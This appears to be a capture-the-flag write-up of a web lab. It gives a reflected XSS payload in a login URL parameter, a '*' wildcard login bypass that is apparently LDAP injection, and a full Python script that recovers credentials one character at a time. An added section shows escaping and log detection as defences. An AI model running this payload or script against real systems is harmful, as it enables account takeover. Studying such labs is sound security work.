Entering a wrong username and password shows that the "permission failed" message is passed through the URL; constructing a payload in that parameter produces an alert popup.

payload : http://178.62.5.61:31279/login?message=<img src=1 onerror=alert(123)>

But we still need to log in. On the login page, enter the wildcard '*' as both the username and the password. Because there is no filtering in front of it, the input is passed straight to the backend, so the login succeeds.

Doing a code review, I found that a /search API is requested; if that succeeds, the search results are displayed (as a table).

The key is still the login: a script is needed to enumerate the possible usernames and passwords. My script is below (final complete version, including password enumeration):

import string

import requests

lab_address = 'http://{your-lab-id}/login'
# Candidate characters, in the original order: letters, braces, digits, '-' and '_'
all_list = string.ascii_uppercase + string.ascii_lowercase + '{}1234567890-_'


def login(username, password='', flag=0):
    """Try one more character on the username (flag == 0) or the password (flag == 1).

    Both fields are sent with a trailing '*' wildcard; a successful login renders the
    search page, whose 'No search results.' text serves as the success oracle.
    Returns the character that logged in, or None if none of them did.
    """
    name = username
    pwd = password
    for ch in all_list:
        if flag == 1:
            pwd = password + ch
        else:
            name = username + ch
        response = requests.post(lab_address,
                                 data={'username': name + '*', 'password': pwd + '*'})
        if 'No search results.' in response.text:
            return ch
    return None


def main():
    username = ''
    password = ''
    flag = 0  # 0: still extending the username, 1: extending the password
    while True:
        res = login(username, password=password, flag=flag)
        if res is not None and flag == 0:
            username += res
        elif res is None and flag == 0:
            flag = 1  # no further username character matches: the username is complete
        elif res is not None and flag == 1:
            password += res
        else:
            break  # no further password character matches: the password is complete
        print('\r[*] Now auth is "{}:{}"'.format(username, password), end='', flush=True)
    print()


if __name__ == '__main__':
    main()
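As an added example (not part of the original writeup), here is the defender's side of the wildcard login above: escaping the credential values per RFC 4515 so that '*' is compared literally, plus a check over constructed login-log lines that flags successful logins whose username carries filter metacharacters, which is exactly the trace the character-by-character enumeration leaves. It assumes the backend builds an LDAP-style filter of the shape shown; the log format is invented for the demonstration.

```python
import re

# RFC 4515: characters that must be escaped inside an LDAP filter assertion value.
_ESCAPES = {'\\': r'\5c', '*': r'\2a', '(': r'\28', ')': r'\29', '\x00': r'\00'}
_METACHARS = re.compile(r'[\\*()\x00]')


def escape_filter_value(value):
    """Escape user input so the directory compares it literally, never as a wildcard."""
    return ''.join(_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter(username, password):
    """Assumed filter shape for the lab's login; both values are escaped before insertion.
    (Matching a password inside a search filter mirrors the lab, it is not a recommendation.)"""
    return '(&(uid={})(userPassword={}))'.format(
        escape_filter_value(username), escape_filter_value(password))


# Constructed sample of an application login log (format is an assumption).
SAMPLE_LOG = """\
2024-03-01T10:00:01Z login user="alice" result=fail
2024-03-01T10:00:02Z login user="a*" result=success
2024-03-01T10:00:03Z login user="ad*" result=success
2024-03-01T10:00:04Z login user="bob" result=success
"""

_LINE = re.compile(r'^(?P<ts>\S+) login user="(?P<user>[^"]*)" result=(?P<result>\w+)$')


def find_wildcard_logins(log_text):
    """Return (timestamp, username) for successful logins whose username contains
    filter metacharacters: a literal username should never need them."""
    hits = []
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if m and m['result'] == 'success' and _METACHARS.search(m['user']):
            hits.append((m['ts'], m['user']))
    return hits
```

With escaping in place, the filter built from the username 'adm*' asks for the literal uid 'adm*', so the prefix oracle the script relies on no longer exists.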